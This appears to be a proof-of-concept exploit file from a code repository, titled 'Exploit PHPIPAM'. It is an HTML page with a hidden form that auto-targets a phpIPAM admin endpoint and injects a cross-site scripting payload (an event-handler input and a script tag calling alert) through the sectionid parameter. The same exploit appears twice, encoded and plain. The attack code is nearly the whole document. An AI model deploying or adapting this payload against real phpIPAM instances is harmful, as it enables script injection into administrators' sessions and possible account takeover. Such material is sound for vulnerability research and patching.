incogbyte/exploit.html

## exploit.html
<html>
  <body>
    <h1> Exploit PHPIPAM </h1>
    <p><strong> By: Incogbyte </strong></p>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php" method="POST">
      <input type="hidden" name="container" value="body" />
      <input type="hidden" name="placement" value="top" />
      <input type="hidden" name="sectionid" value="2&apos;&gt;&lt;input&#32;onpointerleave&#61;&quot;alert&#40;1&#41;&quot;&gt;incogbyte&lt;&#47;input&gt;&lt;script&gt;alert&#40;&apos;incogbyte&apos;&#41;&lt;&#47;script&gt;" />
      <input type="hidden" name="original&#45;title" value="Search&#32;for&#32;free&#32;subnets&#32;in&#32;section&#32;" />
      <input type="submit" value="Exploit" />
    </form>
  </body>
</html>
	<html>
	<body>
	<h1> Exploit PHPIPAM </h1>
	<p><strong> By: Incogbyte </strong></p>
	<script>history.pushState('', '', '/')</script>
	<form action="http://127.0.0.1:8082/app/admin/subnets/find_free_section_subnets.php" method="POST">
	<input type="hidden" name="container" value="body" />
	<input type="hidden" name="placement" value="top" />
	<input type="hidden" name="sectionid" value="2'><input onpointerleave="alert(1)">incogbyte</input><script>alert('incogbyte')</script>" />
	<input type="hidden" name="original-title" value="Search for free subnets in section " />
	<input type="submit" value="Exploit" />
	</form>
	</body>
	</html>